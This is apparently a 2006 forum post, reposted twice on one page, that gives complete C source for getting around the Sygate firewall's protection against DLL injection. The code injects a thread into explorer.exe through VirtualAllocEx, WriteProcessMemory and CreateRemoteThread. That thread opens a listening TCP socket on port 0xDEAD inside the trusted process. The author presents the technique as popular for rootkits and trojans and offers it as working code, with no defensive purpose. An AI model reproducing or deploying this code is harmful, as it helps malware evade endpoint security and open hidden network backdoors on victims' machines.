bypass dll authentication in sygate and such
2006-04-26 02:56
501 查看
akcom
sygate uses a very 'spiff' method that limits injecting a dll into a process, a popular method for rootkits and trojans alike. this is just some example code to bypass sygate dll authentication, its very simple, but its just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executes the thread. the thread then sets up a listening socket, all of which should get bypass sygate's dll authenication.
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );
SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
static void __declspec( naked ) end_proc()
{
}
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};
int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( "kernel32.dll" );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;
GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
printf( "explorer pid: 0x%x/n", dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( "done/n" );
return 0;
}
sygate uses a very 'spiff' method that limits injecting a dll into a process, a popular method for rootkits and trojans alike. this is just some example code to bypass sygate dll authentication, its very simple, but its just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executes the thread. the thread then sets up a listening socket, all of which should get bypass sygate's dll authenication.
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );
SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
static void __declspec( naked ) end_proc()
{
}
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};
int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( "kernel32.dll" );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;
GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
printf( "explorer pid: 0x%x/n", dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( "done/n" );
return 0;
}
相关文章推荐
- Active Directory Authentication in ASP.NET MVC 5 with Forms Authentication and Group-Based Authorization
- Authentication and Authorization in the Google Data Protocol
- How-to: Enable User Authentication and Authorization in Apache HBase
- Authentication and Authorization in ASP.NET Web API
- Write an algorithm such that if an element in an MxN matrix is 0, its entire row and column is set to 0.
- How to create a DLL library in C and then use it with C#
- Creating CustomBinding for WCFBasicHTTP for SSL and BasicAuthentication in BizTalk 转载自:http://geekswithblogs.net/mipsen
- Diagnosing Intermittent Authentication Failures and User Lock-Outs in Oracle WebLogic
- How to create a DLL library in C and then use it with C#
- How-to: Enable User Authentication and Authorization in Apache HBase
- JAAS最经典的文章:USER AUTHENTICATION AND AUTHORIZATION IN THE JAVA(TM) PLATFORM
- Authorization and Authentication In Hadoop
- Find out all the elements in A and B such that the A[i]-B[j]=C[k]
- Databinding methods such as Eval(), XPath(), and Bind() can only be used in the context of a databound control.
- Authentication in HDFS and Hadoop common
- SSH Man-in-the-Middle Attack and Public-Key Authentication Method
- Windows Integrated Authentication in the combination of IIS and Tomcat
- No refs in common and none specified; doing nothing. Perhaps you should specify a branch such as 'ma
- Handling session and authentication timeouts in ASP.Net
- WCF 4 Step By Step Chapter 4 Note (Transport and Message Security + Authentication in Organization)